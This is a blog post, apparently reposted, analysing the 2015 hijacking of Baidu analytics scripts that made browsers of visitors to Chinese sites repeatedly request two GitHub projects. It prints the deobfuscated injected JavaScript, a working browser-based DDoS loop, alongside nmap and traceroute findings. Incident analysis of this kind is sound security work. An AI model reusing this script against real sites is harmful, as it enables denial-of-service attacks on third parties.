As a Chinese living outside of China, I frequently visit Chinese websites, many of which use advertising and visitor tracking provided by Baidu, the largest search engine available in China. As I was browsing one of the most popular Chinese infosec community in China, zone.wooyun.org, at around 12:00pm GMT+8, my browser suddenly started to pop up JS alerts every 5 seconds.
My first thought was someone naughty XSSed the page, so I opened developer tools to find the source of the XSS.
Almost instantly I saw it was keep trying to load these two URLs: github.com/greatefire/ and github.com/cn-nytimes/ every a few seconds.
After some digging I located the source of the JS that did it, a piece of code under each page:
1 2 3 4 | <div style="display: none;"><script type="text/javascript">// <
Seems it has been obfuscated. No custom JS bytecode VM? You call that JS obfuscation? …piece of a cake:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 | document.write("<script src="http://libs.baidu.com/jquery/2.0.0/jquery.min.js">// <![CDATA[\x3c/script>");!window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");startime = (new Date).getTime();var count = 0;function unixtime() { var a = new Date; return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3}url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];NUM = url_array.length;function r_send2() { var a = unixtime() % NUM; get(url_array[a])}function get(a) { var b; $.ajax({ url: a, dataType: "script", timeout: 1E4, cache: !0, beforeSend: function() { requestTime = (new Date).getTime() }, complete: function() { responseTime = (new Date).getTime(); b = Math.floor(responseTime - requestTime); 3E5 > responseTime - startime && (r_send(b), count += 1) } })}function r_send(a) { setTimeout("r_send2()", a)}setTimeout("r_send2()", 2E3); |
Every 2 seconds, as you can see from setTimeout(“r_send2()”, 2E3) , it will try to load an random URL from
I asked some of my friends in China to open the js file from Baidu.com, it was blank as it supposed to, to display a blank page if the request does not have a HTTP referrer.
Apparently many other people have discovered it too:
Appears to be HTTP hijacking.
I scanned hm.baidu.com with NMAP, only two ports were opened, 80 and 443
SSL connection was not hijacked:
Traceroute:
It is also worth noting that on port 80, web server was lighttpd, but on port 443 it was Apache
What is happening here is pretty clear now:
A certain device at the border of China’s inner network and the Internet has hijacked the HTTP connections went into China, replaced some javascript files from Baidu with malicious ones that would load
every two seconds.
OK that explained something but not everything, why it started to alert user with
Warning: malicious javascript detected on this domain
When I opened one of the urls being DDoSed above, the content was:
1 | alert("WARNING: malicious javascript detected on this domain") |
Very clever, use alert to block code execution to prevent it being called in a loop. Maybe it was done by Github or Greatfire themselves, who knows.
Conclusion:
Remember this?
http://furbo.org/2015/01/22/fear-china/
In other words, even people outside China are being weaponized to target things the Chinese government does not like, for example, freedom of speech.
'malware ' 카테고리의 다른 글
| YARA Rules For Shellcode (0) | 2015.04.02 |
|---|---|
| CVE-2011-2461 (0) | 2015.04.01 |
| Malicious XML: Matryoshka Edition (0) | 2015.03.30 |
| THE OLD IS NEW, AGAIN. CVE-2011-2461 IS BACK! (0) | 2015.03.24 |
| Freshly Patched Flash Exploit Added to Nuclear Exploit Kit (0) | 2015.03.23 |